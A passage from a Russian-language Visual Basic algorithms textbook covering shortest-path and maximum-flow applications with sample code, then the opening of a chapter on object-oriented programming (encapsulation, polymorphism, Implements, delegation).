Заметьте, что вы не нашли бы этот путь, если бы построили дерево кратчайшего маршрута в исходной сети. Без учета штрафов за повороты, кратчайшим маршрутом из узла D в узел C был бы путь D, E, B, C с полной ценой 12. С учетом штрафов цена этого пути равна 17.
Применения метода поиска кратчайшего маршрута
Вычисления кратчайшего маршрута используются во многих приложениях. Очевидным примером является поиск кратчайшего маршрута между двумя точками в уличной сети. Многие другие приложения используют метод поиска кратчайшего маршрута менее очевидными способами. Следующие разделы описывают некоторые из этих приложений.
Разбиение на районы
Предположим, что имеется карта города, на которую нанесены все пожарные депо. Может потребоваться определить для каждой точки города ближайшее к ней депо. На первый взгляд это кажется трудной задачей. Можно попытаться рассчитать дерево кратчайшего маршрута с корнем в каждом узле сети, чтобы найти, какое депо расположено ближе всего к каждому из узлов. Или можно построить дерево кратчайшего маршрута с корнем в каждом из пожарных депо и записать расстояние от каждого из узлов до каждого из депо. Но существует намного более быстрый метод.
Создадим ложный корневой узел и соединим его с каждым из пожарных депо связями с нулевой ценой. Затем найдем дерево кратчайшего маршрута с корнем в этом ложном узле. Для каждой точки в сети кратчайший маршрут из ложного корневого узла к этой точке пройдет через ближайшее к этой точке пожарное депо. Чтобы найти ближайшее к точке пожарное депо, нужно просто проследовать по кратчайшему маршруту от этой точки к корню, пока на пути не встретится одно из депо. Построив всего одно дерево кратчайшего маршрута, можно найти ближайшие пожарные депо для каждой точки в сети.
Программа District использует этот алгоритм для разбиения сети на районы. Так же, как и программа PathC и другие программы, описанные в этой главе, она позволяет загружать, редактировать и сохранять на диске ориентированные сети с ценой связей. Если вы не добавляете и не удаляете узлы или связи, вы можете выбрать депо для разделения на районы. Добавьте узлы к списку пожарных депо щелчком левой кнопки мыши, затем щелкните правой кнопкой в любом месте формы, и программа разобьет сеть на районы.
На рис. 12.17 показано окно программы, на котором изображена сеть с тремя депо. Депо в узлах 3, 18 и 20 обведены жирными кружочками. Разбивающие сеть на районы деревья кратчайшего маршрута изображены жирными линиями.
=====340
@Рис. 12.17. Программа District
Составление плана работ с использованием метода критического пути
Во многих задачах, в том числе в больших программных проектах, определенные действия должны быть выполнены раньше других. Например, при строительстве дома до установки фундамента нужно вырыть котлован, фундамент должен застыть до того, как начнется возведение стен, каркас дома должен быть собран прежде, чем можно будет выполнять проводку электричества, водопровода и кровельные работы и так далее.
Некоторые из этих задач могут выполняться одновременно, другие должны выполняться последовательно. Например, можно одновременно проводить электричество и прокладывать водопровод.
Критическим путем (critical path) называется одна из самых длинных последовательностей задач, которая должна быть выполнена для завершения проекта. Важность задач, лежащих на критическом пути, определяется тем, что сдвиг сроков выполнения этих задач приведет к изменению времени завершения проекта в целом. Если заложить фундамент на неделю позже, то и здание будет завершено на неделю позже. Для определения заданий, которые находятся на критическом пути, можно использовать модифицированный алгоритм поиска кратчайшего маршрута.
Вначале создадим сеть, которая представляет временные соотношения между задачами проекта. Пусть каждой задаче соответствует узел. Нарисуем связь между задачей I и задачей J, если задача I должна быть выполнена до начала задачи J, и присвоим этой связи цену, равную времени выполнения задачи I.
После этого создадим два ложных узла, один из которых будет соответствовать началу проекта, а другой — его завершению. Соединим начальный узел связями с нулевой ценой со всеми узлами в проекте, в которые не входит ни одна другая связь. Эти узлы соответствуют задачам, выполнение которых можно начинать немедленно, не ожидая завершения других задач.
Затем создадим ложные связи нулевой длины, соединяющие все узлы, из которых не выходит не одной связи, с конечным узлом. Эти узлы представляют задачи, которые не тормозят выполнение других задач. После того, как все эти задачи будут выполнены, проект будет завершен.
Найдя самый длинный маршрут между начальным и конечным узлами сети, мы получим критический путь проекта. Входящие в него задачи будут критичными для выполнения проекта.
========341
@Таблица 12.1. Этапы сборки дождевальной установки
Рассмотрим, например, упрощенный проект сборки дождевальной установки, состоящий из пяти задач. В табл. 12.1 приведены задачи и временные соотношения между ними. Сеть для этого проекта показана на рис. 12.18.
В этом простом примере легко увидеть, что самый длинный маршрут в сети выполняет следующую последовательность задач: выкопать канавы, смонтировать трубы, закопать их. Это критические задачи, и если в выполнении какойлибо из них наступит задержка, выполнение проекта также задержится.
Длина этого критического пути равна ожидаемому времени завершения проекта. В данном случае, если все задачи будут выполнены вовремя, выполнение проекта займет пять дней. При этом предполагается также, что если это возможно, несколько задач будут выполняться одновременно. Например, один человек может копать канавы, пока другой будет закупать трубы.
В более значительном проекте, таком как строительство небоскреба или съемка фильма, могут содержаться тысячи задач, и критические пути при этом могут быть совсем не очевидны.
Планирование коллективной работы
Предположим, что требуется набрать несколько сотрудников для ответов на телефонные звонки, при этом каждый из них будет занят не весь день. При этом нужно, чтобы суммарная зарплата была наименьшей, и нанятый коллектив сотрудников отвечал на звонки с 9 утра до 5 вечера. В табл. 12.2 приведены рабочие часы сотрудников, и их почасовая оплата.
@Рис. 12.18. Сеть задач сборки дождевальной установки
======342
@Таблица 12.2. Рабочие часы сотрудников и их почасовая оплата
Для построения соответствующей сети, создадим один узел для каждого рабочего часа. Соединим эти узлы связями, каждая из которых соответствует рабочим часам какоголибо сотрудника. Если сотрудник может работать с 9 до 11, нарисуем связь между узлом 9:00 и узлом 11:00, и присвоим этой связи цену, равную зарплате, получаемой данным сотрудником за соответствующее время. Если сотрудник получает 6,5 долларов в час, и отрезок времени составляет два часа, то цена связи равна 13 долларам. На рис. 12.19 показана сеть, соответствующая данным из табл. 12.2.
Кратчайший маршрут из первого узла в последний позволяет набрать коллектив сотрудников с наименьшей суммарной зарплатой. Каждая связь в пути соответствует работе сотрудника в определенный промежуток времени. В данном случае кратчайший маршрут из узла 9:00 в узел 5:00 проходит через узлы 11:00, 12:00 и 3:00. Этому соответствует следующий график работы: сотрудник A работает с 9:00 до 11:00, сотрудник D работает с 11:00 до 12:00, затем сотрудник A снова работает с 12:00 до 3:00 и сотрудник E работает с 3:00 до 5:00. Полная зарплата всех сотрудников при таком графике составляет 52,15 доллара.
@Рис. 12.19. Сеть графика работы коллектива
======343
Максимальный поток
Во многих сетях связи имеют кроме цены, еще и пропускную способность (capacity). Через каждый узел сети может проходить поток (flow), который не превышает ее пропускной способности. Например, по улицам может проехать только определенной число машин. Сеть с заданными пропускными способностями ее связей называется нагруженной сетью (capacitated network). Если задана нагруженная сеть, задача о максимальном потоке заключается в определении наибольшего возможного потока через сеть из заданного источника (source) в заданный сток (sink).
На рис. 12.20 показана небольшая нагруженная сеть. Числа рядом со связями в этой сети — это не цена связи, а ее пропускная способность. В этом примере максимальный поток, равный 4, получается, если две единицы потока направляются по пути A, B, E,F и еще две — по пути A, C, D, F.
Описанный здесь алгоритм начинается с того, что поток во всех связях равен нулю и затем алгоритм постепенно увеличивает поток, пытаясь улучшить найденное решение. Алгоритм завершает работу, если нельзя улучшить имеющееся решение.
Для поиска путей способов увеличения полного потока, алгоритм проверяет остаточную пропускную способность (residual capacity) связей. Остаточная пропускная способность связи между узлами I и J равна максимальному дополнительному потоку, который можно направить из узла I в узел J, используя связь между I и J и связь между J и I. Этот суммарный поток может включать дополнительный поток по связи IJ, если в этой связи есть резерв пропускной способности, или исключать часть потока из связи JI, если по этой связи идет поток.
Например, предположим, что в сети, соединяющей узлы A и C на рис. 12.20, существует поток, равный 2. Так как пропускная способность этой связи равна 3, то к этой связи можно добавить единицу потока, поэтому остаточная пропускная способность этой связи равна 1. Хотя сеть, показанная на рис. 12.20 не имеет связи CA, для этой связи существует остаточная пропускная способность. В данном примере, так как по связи AC идет поток, равный 2, то можно удалить до двух единиц этого потока. При этом суммарный поток из узла C в узел A увеличился бы на 2, поэтому остаточная пропускная способность связи CA равна 2.
@Рис. 12.20. Нагруженная сеть
========344
@Рис. 12.21. Потоки в сети
Сеть, состоящая из всех связей с положительной остаточной пропускной способностью, называется остаточной сетью (residual network). На рис. 12.21 показана сеть с рис. 12.20, каждой связи в которой присвоен поток. Для каждой связи, первое число равно потоку через связь, а второе — ее пропускной способности. Надпись «1/2», например, означает, что поток через связь равен 1, и ее пропускная способность равна 2. Связи, поток через которые больше нуля, нарисованы жирными линиями.
На рис. 12.22 показана остаточная сеть, соответствующая потокам на рис. 12.21. Нарисованы только связи, которые действительно могут иметь остаточную пропускную способность. Например, между узлами A и D не нарисовано ни одной связи. Исходная сеть не содержит связи AD или DA, поэтому эти связи всегда будут иметь нулевую остаточную пропускную способность.
Одно из свойств остаточных сетей состоит в том, что любой путь, использующий связи с остаточной пропускной способностью больше нуля, который связывает источник со стоком, дает способ увеличения потока в сети. Так как этот путь дает способ увеличения или расширения потока в сети, он называется расширяющим путем (augmenting path). На рис. 12.23 показана остаточная сеть с рис. 12.22 с расширяющим путем, нарисованным жирной линией.
Чтобы обновить решение, используя расширяющий путь, найдем наименьшую остаточную пропускную способность в пути. Затем скорректируем потоки в пути в соответствии с этим значением. Например, на рис. 12.23 наименьшая остаточная пропускная способность сетей в расширяющем пути равна 2. Чтобы обновить потоки в сети, к любой связи IJ на пути добавляется поток 2, а из всех обратных им связей JI вычитается поток 2.
@Рис. 12.22. Остаточная сеть
========345
@Рис. 12.23. Расширяющий путь через остаточную сеть
Вместо того, чтобы корректировать потоки, и затем перестраивать остаточную сеть, проще просто скорректировать остаточную сеть. Затем после завершения работы алгоритма можно использовать результат для вычисления потоков для связей в исходной сети.
Чтобы скорректировать остаточную сеть в этом примере, проследуем по расширяющему пути. Вычтем 2 из остаточной пропускной способности всех связей IJ вдоль пути, и добавим 2 к остаточной пропускной способности соответствующей связи JI. На рис. 12.24 показана скорректированная остаточная сеть для этого примера.
Если больше нельзя найти ни одного расширяющего пути, то можно использовать остаточную сеть для вычисления потоков в исходной сети. Для каждой связи между узлами I и J, если остаточный поток между узлами I и J меньше, чем пропускная способность связи, то поток должен равняться пропускной способности минус остаточный поток. В противном случае поток должен быть равен нулю.
Например, на рис. 12.24 остаточный поток из узла A в узел C равен 1 и пропускная способность связи AC равна 3. Так как 1 меньше 3, то поток через узел будет равен 3 - 1 = 2. На рис. 12.25 показаны потоки в сети, соответствующие остаточной сети на рис. 12.24.
@Рис. 12.24. Скорректированная остаточная сеть
========346
@Рис. 12.25. Максимальные потоки
Полученный алгоритм еще не содержит метода для поиска расширяющих путей в остаточной сети. Один из возможных методов аналогичен методу коррекции меток для алгоритма кратчайшего маршрута. Вначале поместим узелисточник в список возможных узлов. Затем, если список возможных узлов не пуст, будем удалять из него по одному узлу. Проверим все соседние узлы, соединенные с выбранным узлом по связи, остаточная пропускная способность которой больше нуля. Если соседний узел еще не был помещен в список возможных узлов, добавить его в список. Продолжить этот процесс до тех пор, пока список возможных узлов не опустеет.
Этот метод имеет два отличия от метода поиска кратчайшего маршрута коррекцией меток. Вопервых, этот метод не прослеживает связи с нулевой остаточной пропускной способностью. Алгоритм же кратчайшего маршрута проверяет все пути, независимо от их цены.
Вовторых, этот алгоритм проверяет все узлы не больше одного раза. Алгоритм поиска кратчайшего маршрута коррекцией меток, будет обновлять узлы и помещать их снова в список возможных узлов, если он позднее найдет более короткий путь от корня к этому узлу. При поиске расширяющего пути нет необходимости проверять его длину, поэтому не нужно обновлять пути и помещать узлы назад в список возможных узлов.
Следующий код демонстрирует, как можно вычислять максимальные потоки в программе на Visual Basic. Этот код предназначен для работы с неориентированными сетями, похожими на те, которые использовались в других программах примеров, описанных в этой главе. После завершения работы алгоритма он присваивает связи цену, равную потоку через нее, взятому со знаком минус, если поток течет в обратном направлении. Другими словами, если сеть содержит объект, представляющий связь IJ, а алгоритм определяет, что поток должен течь в направлении связи JI, то потоку через связь IJ присваивается значение, равное потоку, который должен был бы течь через связь JI, взятому со знаком минус. Это позволяет программе определять направление потока, используя существующую структуру узлов.
=======347
Private Sub FindMaxFlows()
Dim candidates As Collection
Dim Residual() As Integer
Dim num_nodes As Integer
Dim id1 As Integer
Dim id2 As Integer
Dim node As FlowNode
Dim to_node As FlowNode
Dim from_node As FlowNode
Dim link As FlowLink
Dim min_residual As Integer
If SourceNode Is Nothing Or SinkNode Is Nothing _
Then Exit Sub
' Задать размер массива остаточной пропускной способности.
num_nodes = Nodes.Count
ReDim Residual(1 To num_nodes, 1 To num_nodes)
' Первоначально значения остаточной пропускной способности
' равны значениям пропускной способности.
For Each node In Nodes
id1 = node.Id
For Each link In node.Links
If link.Node1 Is node Then
Set to_node = link.Node2
Else
Set to_node = link.Node1
End If
id2 = to_node.Id
Residual(id1, id2) = link.Capacity
Next link
Next node
' Повторять до тех пор, пока больше
' не найдется расширяющих путей.
Do
' Найти расширяющий путь в остаточной сети.
' Сбросить значения NodeStatus и InLink всех узлов.
For Each node In Nodes
node.NodeStatus = NOT_IN_LIST
Set node.InLink = Nothing
Next node
' Начать с пустого списка возможных узлов.
Set candidates = New Collection
' Поместить источник в список возможных узлов.
candidates.Add SourceNode
SourceNode.NodeStatus = NOW_IN_LIST
' Продолжать, пока список возможных узлов не опустеет.
Do While candidates.Count > 0
Set node = candidates(1)
candidates.Remove 1
node.NodeStatus = WAS_IN_LIST
id1 = node.Id
' Проверить выходящие из узла связи.
For Each link In node.Links
If link.Node1 Is node Then
Set to_node = link.Node2
Else
Set to_node = link.Node1
End If
id2 = to_node.Id
' Проверить, что residual > 0, и этот узел
' никогда не был в списке.
If Residual(id1, id2) > 0 And _
to_node.NodeStatus = NOT_IN_LIST _
Then
' Добавить узел в список.
candidates.Add to_node
to_node.NodeStatus = NOW_IN_LIST
Set to_node.InLink = link
End If
Next link
' Остановиться, если помечен узелсток.
If Not (SinkNode.InLink Is Nothing) Then _
Exit Do
Loop
' Остановиться, если расширяющий путь не найден.
If SinkNode.InLink Is Nothing Then Exit Do
' Найти наименьшую остаточную пропускную способность
' вдоль расширяющего пути.
min_residual = INFINITY
Set node = SinkNode
Do
If node Is SourceNode Then Exit Do
id2 = node.Id
Set link = node.InLink
If link.Node1 Is node Then
Set from_node = link.Node2
Else
Set from_node = link.Node1
End If
id1 = from_node.Id
If min_residual > Residual(id1, id2) Then _
min_residual = Residual(id1, id2)
Set node = from_node
Loop
' Обновить остаточные пропускные способности,
' используя расширяющий путь.
Set node = SinkNode
Do
If node Is SourceNode Then Exit Do
id2 = node.Id
Set link = node.InLink
If link.Node1 Is node Then
Set from_node = link.Node2
Else
Set from_node = link.Node1
End If
id1 = from_node.Id
Residual(id1, id2) = Residual(id1, id2) _
- min_residual
Residual(id2, id1) = Residual(id2, id1) _
+ min_residual
Set node = from_node
Loop
Loop ' Повторять, пока больше не останется расширяющих путей.
' Вычислить потоки в остаточной сети.
For Each link In Links
id1 = link.Node1.Id
id2 = link.Node2.Id
If link.Capacity > Residual(id1, id2) Then
link.Flow = link.Capacity - Residual(id1, id2)
Else
' Отрицательные значения соответствуют
' обратному направлению движения.
link.Flow = Residual(id2, id1) - link.Capacity
End If
Next link
' Найти полный поток.
TotalFlow = 0
For Each link In SourceNode.Links
TotalFlow = TotalFlow + Abs(link.Flow)
Next link
End Sub
=======348-350
Программа Flow использует метод поиска расширяющего пути для нахождения максимального потока в сети. Она похожа на остальные программы в этой главе. Если вы не добавляете или не удаляете узел или связь, вы можете выбрать источник при помощи левой кнопки мыши, а затем выбрать сток при помощи правой кнопки мыши. После выбора источника и стока программа вычисляет и выводит на экран максимальный поток. На рис. 12.26 показано окно программы, на котором изображены потоки в небольшой сети.
Приложения максимального потока
Вычисления максимального потока используются во многих приложениях. Хотя для многих сетей может быть важно знать максимальный поток, этот метод часто используется для получения результатов, которые на первый взгляд имеют отдаленное отношение к пропускной способности сети.
Непересекающиеся пути
Большие сети связи должны обладать избыточностью (redundancy). Для заданной сети, например такой, как на рис. 12.27, может потребоваться найти число непересекающихся путей из источника к стоку. При этом, если между двумя узлами сети есть множество непересекающихся путей, все связи в которых различны, то соединение между этими узлами останется, даже если несколько связей в сети будут разорваны.
Можно определить число различных путей, используя метод вычисления максимального потока. Создадим сеть с узлами и связями, соответствующими узлам и связям в коммуникационной сети. Присвоим каждой связи единичную пропускную способность.
@Рис. 12.26. Программа Flow
=====351
@Рис. 12.27. Сеть коммуникаций
Затем вычислим максимальный поток в сети. Максимальный поток будет равен числу различных путей от источника к стоку. Так как каждая связь может нести единичный поток, то ни один из путей, использованных при вычислении максимального потока, не может иметь общей связи.
При более строгом определении избыточности можно потребовать, чтобы различные пути не имели ни общих связей, ни общих узлов. Немного изменив предыдущую сеть, можно использовать вычисление максимального потока для решения и этой задачи.
Разделим каждый узел за исключением источника и стока на два узла, соединенных связью единичной пропускной способности. Соединим первый из полученных узлов со всеми связями, входящими в исходный узел. Все связи, выходящие из исходного узла, присоединим ко второму полученному после разбиения узлу. На рис. 12.28 показана сеть с рис. 12.27, узлы на которой разбиты таким образом. Теперь найдем максимальный поток для этой сети.
Если путь, использованный для вычисления максимального потока, проходит через узел, то он может использовать связь, которая соединяет два получившихся после разбиения узла. Так как эта связь имеет единичную пропускную способность, никакие два пути, полученные при вычислении максимального потока, не могут пройти по этой связи между узлами, поэтому в исходной сети никакие два пути не могут использовать один и тот же узел.
@Рис. 12.28. Коммуникационная сеть после преобразования
======352
@Рис. 12.29. Сеть распределения работы
Распределение работы
Предположим, что имеется группа сотрудников, каждый из которых обладает определенными навыками. Предположим также, что существует ряд заданий, которые требуют привлечения сотрудника, обладающего заданным набором навыков. Задача распределения работы (work assignment) состоит в том, чтобы распределить работу между сотрудниками так, чтобы каждое задание выполнял сотрудник, имеющий соответствующие навыки.
Чтобы свести эту задачу к вычислению максимального потока, создадим сеть с двумя столбцами узлов. Каждый узел в левом столбце представляет одного сотрудника. Каждый узел в правом столбце представляет одно задание.
Затем сравним навыки каждого сотрудника с навыками, необходимыми для выполнения каждого из заданий. Создадим связь между каждым сотрудником и каждым заданием, которое он способен выполнить, и присвоим всем связям единичную пропускную способность.
Создадим узелисточник и соединим его с каждым из сотрудников связью единичной пропускной способности. Затем создадим узелсток и соединим с ним каждое задание, снова при помощи связей с единичной пропускной способностью. На рис. 12.29 показана соответствующая сеть для задачи распределения работы с четырьмя сотрудниками и четырьмя заданиями.
Теперь найдем максимальный поток из источника в сток. Каждая единица потока должна пройти через один узел сотрудника и один узел задания. Этот поток представляет распределение работы для этого сотрудника.
@Рис. 12.30. Программа Work
=======353
Если сотрудники обладают соответствующими навыками для выполнения всех заданий, то вычисления максимального потока распределят их все. Если невозможно выполнить все задания, то в процессе вычисления максимального потока работа будет распределена так, чтобы было выполнено максимально возможное число заданий.
Программа Work использует этот алгоритм для распределения работы между сотрудниками. Введите фамилии сотрудников и их навыки в текстовом поле слева, а задания, которые требуется выполнить и требующиеся для них навыки в текстовом поле посередине. После того, как вы нажмете на кнопку Go (Начать), программа распределит работу между сотрудниками, используя для этого сеть максимального потока. На рис. 12.30 показано окно программы с полученным распределением работы.
Резюме
Некоторые сетевые алгоритмы можно применить непосредственно к сетеподобным объектам. Например, можно использовать алгоритм поиска кратчайшего маршрута для нахождения наилучшего пути в уличной сети. Для определения наименьшей стоимости построения сети связи или соединения городов железными дорогами можно использовать минимальное остовное дерево.
Многие другие сетевые алгоритм находят менее очевидные применения. Например, можно использовать алгоритмы поиска кратчайшего маршрута для разбиения на районы, составления плана работ методом кратчайшего пути, или графика коллективной работы. Алгоритмы вычисления максимального потока можно использовать для распределения работы. Эти менее очевидные применения сетевых алгоритмов обычно оказываются более интересными и перспективными.
======354
Глава 13. Объектноориентированные методы
Использование функций и подпрограмм позволяет программисту разбить код большой программы на части. Массивы и определенные пользователем типы данных позволяют сгруппировать элементы данных так, чтобы упросить работу с ними.
Классы, которые впервые появились в 4-й версии Visual Basic, позволяют программисту поновому сгруппировать данные и логику работы программы. Класс позволяет объединить в одном объекте данные и методы работы с ними. Этот новый подход к управлению сложностью программ позволяет взглянуть на алгоритмы с другой точки зрения.
В этой главе рассматриваются вопросы объектноориентированного программирования, возникающие при применении классов Visual Basic. В ней описаны преимущества объектноориентированного программирования (ООП) и показано, какую выгоду можно получить от их применения в программах на языке Visual Basic. Затем в главе рассматривается набор полезных объектноориентированных примеров, которые вы можете использовать для управления сложностью ваших приложений.
Преимущества ООП
К традиционным преимуществам объектноориентированного программирования относятся инкапсуляция или скрытие (encapsulation), полиморфизм (polymorphism) и повторное использование (reuse). Реализация их в классах Visual Basic несколько отличается от того, как они реализованы в других объектноориентированных языках. В следующих разделах рассматриваются эти преимущества ООП и то, как можно ими воспользоваться в программах на Visual Basic.
Инкапсуляция
Объект, определенный при помощи класса, заключает в себе данные, которые он содержит. Другие части программы могут использовать объект для оперирования его данными, не зная о том, как хранятся или изменяются значения данных. Объект предоставляет открытые (public) процедуры, функции, и процедуры изменения свойств, которые позволяют программе косвенно манипулировать или просматривать данные. Так как при этом данные являются абстрактными с точки зрения программы, это также называется абстракцией данных (data abstraction).
Инкапсуляция позволяет программе использовать объекты как «черные ящики». Программа может использовать открытые методы объекта для проверки и изменения значений без необходимости разбираться в том, что происходит внутри черного ящика.
=========355
Поскольку действия внутри объектов скрыты от основной программы, реализация объекта может меняться без изменения основной программы. Изменения в свойствах объекта происходят только в модуле класса.
Например, предположим, что имеется класс FileDownload, который скачивает файлы из Internet. Программа сообщает классу FileDownload положение объекта, а объект возвращает строку с содержимым файла. В этом случае программе не требуется знать, каким образом объект производит загрузку файла. Он может скачивать файл, используя модемное соединение или соединение по выделенной линии, или даже извлекать файл из кэша на локальном диске. Программа знает только, что объект возвращает строку после того, как ему передается ссылка на файл.
Обеспечение инкапсуляции
Для обеспечения инкапсуляции класс должен предотвращать непосредственный доступ к своим данным. Если переменная в классе объявлена как открытая, то другие части программы смогут напрямую изменять и считывать данные из нее. Если позднее представление данных изменится, то любые части программы, которые непосредственно взаимодействуют с данными, также должны будут измениться. При этом теряется преимущество инкапсуляции.
Чтобы обеспечить доступ к данным, класс должен использовать процедуры для работы со свойствами. Например, следующие процедуры позволяют другим частям программы просматривать и изменять значение DegreesF объекта Temperature.
Private m_DegreesF As Single ' Градусы Фаренгейта.
Public Property Get DegreesF() As Single
DegreesF = m_DegreesF
End Property
Public Property Let DegreesF(new_DegreesF As Single)
m_DegreesF = new_DegreesF
End Property
Различия между этими процедурами и определением m_DegreesF как открытой переменной пока невелики. Тем не менее, использование этих процедур позволяет легко изменять класс в дальнейшем. Например, предположим, что вы решите измерять температуру в градусах Кельвина, а не Фаренгейта. При этом можно изменить класс, не затрагивая остальных частей программы, в которых используются процедуры свойства DegreesF. Можно также добавить код для проверки ошибок, чтобы убедиться, что программа не попытается передать объекту недопустимые значения.
Private m_DegreesK As Single ' Градусы Кельвина.
Public Property Get DegreesF() As Single
DegreesF = (m_DegreesK - 273.15) * 1.8
End Property
Public Property Let DegreesF(ByVal new_DegreesF As Single)
Dim new_value As Single
new_value = (new_DegreesF / 1.8) + 273.15
If new_value < 0 Then
' Сообщить об ошибке недопустимое значении.
Error.Raise 380, "Temperature", _
"Температура должна быть неотрицательной."
Else
m_DegreesK = new_value
End If
End Property
======357
Программы, описанные в этом материале, безобразно нарушают принцип инкапсуляции, используя в классах открытые переменные. Это не слишком хороший стиль программирования, но так сделано по трем причинами.
Вопервых, непосредственное изменение значений данных выполняется быстрее, чем вызов процедур свойств. Большинство программ уже и так несколько теряют в производительности изза использования ссылок на объекты вместо применения более сложного метода псевдоуказателей. Применения процедур свойств еще сильнее замедлит их работу.
Вовторых, многие программы демонстрируют методы работы со структурами данных. Например, сетевые алгоритмы, описанные в 12 главе, непосредственно используют данные объекта. Указатели, которые связывают узлы в сети друг с другом, составляют неотъемлемую часть алгоритмов. Было бы бессмысленно менять способ хранения этих указателей.
И, наконец, благодаря использованию открытых значений данных, код становится проще. Это позволяет вам сконцентрироваться на алгоритмах, и этому не мешают лишние процедуры работы со свойствами.
Полиморфизм
Второе преимущество объектноориентированного программирования — это полиморфизм (polymorphism), что означает «имеющий множество форм». В Visual Basic это означает, что один объект может иметь различный формы в зависимости от ситуации. Например, следующий код представляет собой подпрограмму, которая может принимать в качестве параметра любой объект. Объект obj может быть формой, элементом управления, или объектом определенного вами класса.
Private Sub ShowName(obj As Object)
MsgBox TypeName(obj)
End Sub
Полиморфизм позволяет создавать процедуры, которые могут работать буквально со всеми типами объектов. Но за эту гибкость приходится платить. Если определить обобщенный (generic) объект, как в этом примере, то Visual Basic не сможет определить, какие типы действий сможет выполнять объект, до запуска программы.
========357
Если Visual Basic заранее знает, с объектом какого типа он будет иметь дело, он может выполнить предварительные действия для того, чтобы более эффективно использовать объект. Если используется обобщенный (generic) объект, то программа не может выполнить подготовки, и в результате этого потеряет в производительности.
Программа Generic демонстрирует разницу в производительности между объявлением объектов как принадлежащих к определенному типу или как обобщенных объектов. Тест выполняется одинаково, за исключением того, что в одном из случаев объект определяется, как имеющий тип Object, а не тип SpecificClass. При этом установка значения данных объекта с использованием обобщенного объекта выполняется в 200 раз медленнее.
Private Sub TestSpecific()
Const REPS = 1000000 ' Выполнить миллион повторений.
Dim obj As SpecificClass
Dim i As Long
Dim start_time As Single
Dim stop_time As Single
Set obj = New SpecificClass
start_time = Timer
For i = 1 To REPS
obj.Value = I
Next i
stop_time = Timer
SpecificLabel.Caption = _
Format$(1000 * (stop_time - start_time) / REPS, "0.0000")
End Sub
Зарезервированное слово Implements
В 5й версии Visual Basic зарезервированное слово Implements (Реализует) позволяет программе использовать полиморфизм без использования обобщенных объектов. Например, программа может определить интерфейс Vehicle (Средство передвижения), Если классы Car (Автомобиль) и Truck (Грузовик) оба реализуют интерфейс Vehicle, то программа может использовать для выполнения функций интерфейса Vehicle объекты любого из двух классов.
Создадим вначале класс интерфейса, в котором определим открытые переменные, которые он будет поддерживать. В нем также должны быть определены прототипы открытых процедур для всех методов, которые он будет поддерживать. Например, следующий код демонстрирует, как класс Vehicle может определить переменную Speed (Скорость) и метод Drive (Вести машину):
Public Speed Long
Public Sub Drive()
End Sub
=======358
Теперь создадим класс, который реализует интерфейс. После оператора Option Explicit в секции Declares добавляется оператор Implements определяющий имя класса интерфейса. Этот класс должен также определять все необходимые для работы локальные переменные.
Класс Car реализует интерфейс Vehicle. Следующий код демонстрирует, как в нем определяется интерфейс и закрытая (private) переменная m_Speed:
Option Explicit
Implements Vehicle
Private m_Speed As Long
Когда к классу добавляется оператор Implements, Visual Basic считывает интерфейс, определенный указанным классом, а затем создает соответствующие заглушки в коде класса. В этом примере Visual Basic добавит новую секцию Vehicle в исходный код класса Car, и определит процедуры let и get свойства Vehicle_Speed для представления переменной Speed, определенной в интерфейсе Vehicle. В процедуре let Visual Basic использует переменную RHS, которая является сокращением от Right Hand Side (С правой стороны), в которой задается новое значение переменной.
Также определяется процедура Vehicle_Drive. Чтобы реализовать функции этих процедур, нужно написать код для них. Следующий код демонстрирует, как класс Car может определять процедуры Speed и Drive.
Private Property Let Vehicle_Speed(ByVal RHS As Long)
m_Speed = RHS
End Property
Private Property Get Vehicle_Speed() As Long
Vehicle_Speed = m_Speed
End Property
Private Sub Get Vehicle_Drive()
' Выполнить какието действия.
:
End Property
После того, как интерфейс определен и реализован в одном или нескольких классах, программа может полиморфно использовать элементы в этих классах. Например, допустим, что программа определила классы Car и Track, которые оба реализуют интерфейс Vehicle. Следующий код демонстрирует, как программа может проинициализировать значения переменной Speed для объекта Car и объекта Truck.
Dim obj As Vehicle
Set obj = New Car
obj.Speed = 55
Set obj = New Truck
obj .Speed =45
==========359
Ссылка obj может указывать либо на объект Car, либо на объект Truck. Так как в обоих этих объектах реализован интерфейс Vehicle, то программа может оперировать свойством obj.Speed независимо от того, указывает ли ссылка obj на Car или Truck.
Так как ссылка obj указывает на объект, который реализует интерфейс Vehicle, то Visual Basic знает, что этот объект имеет процедуры, работающие со свойством Speed. Это означает, что он может выполнять вызовы процедур свойства Speed более эффективно, чем это было бы в случае, если бы obj была ссылкой на обобщенный объект.
Программа Implem является доработанной версией программы описанной выше программы Generic. Она сравнивает скорость установки значений с использованием обобщенных объектов, определенных объектов и объектов, которые реализуют интерфейс. В одном из тестов на компьютере с процессором Pentium с тактовой частотой 166 МГц, программе потребовалось 0,0007 секунды для установки значений при использовании определенного типа объекта. Для установки значений при использовании объекта, реализующего интерфейс, потребовалось 0,0028 секунды (в 4 раза больше). Для установки значений при использовании обобщенного объекта потребовалось 0,0508 секунды (в 72 раза больше). Использование интерфейса является не таким быстрым, как использование ссылки на определенный объект, но намного быстрее, чем использование обобщенных объектов.
Наследование и повторное использование
Процедуры и функции поддерживают повторное использование (reuse). Вместо того, чтобы каждый раз писать код заново, можно поместить его в подпрограмму, тогда вместо блока кода можно просто подставить вызов подпрограммы.
Аналогично, определение процедуры в классе делает ее доступной во всей программе. Программа может использовать эту процедуру, используя объект, который является экземпляром класса.
В среде программистов, использующих объектноориентированный подход, под повторным использованием обычно подразумевается нечто большее, а именно наследование (inheritance). В объектноориентированных языках, таких как C++ или Delphi, один класс может порождать (derive) другой. При этом второй класс наследует (inherits) всю функциональность первого класса. После этого можно добавлять, изменять или убирать какиелибо функции из классанаследника. Это также является формой повторного использования кода, поскольку при этом программисту не нужно заново реализовать функции родительского класса, для того, чтобы использовать их в классенаследнике.
Хотя Visual Basic и не поддерживает наследование непосредственно, можно добиться примерно тех же результатов, используя ограничение (containment) или делегирование (delegation). При делегировании объект из одного класса содержит экземпляр класса из другого объекта, и затем передает часть своих обязанностей заключенному в нем объекту.
Например, предположим, что имеется класс Employee, который представляет данные о сотрудниках, такие как фамилия, идентификационный номер в системе социального страхования и зарплата. Предположим, что нам теперь нужен класс Manager, который делает то же самое, что и класс Employee, но имеет еще одно свойство secretary (секретарь).
Для использования делегирования, класс Manager должен включать в себя закрытый объект типа Employee с именем m_Employee. Вместо прямого вычисления значений, процедуры работы со свойствами фамилии, номера социального страхования и зарплаты передают соответствующие вызовы объекту m_Employee. Следующий код демонстрирует, как класс Manager может оперировать процедурами свойства name (фамилия):
==========360
Private m_Employee As New Employee
Property Get Name() As String
Name = m_Employee.Name
End Property
Property Let Name (New_Name As String)
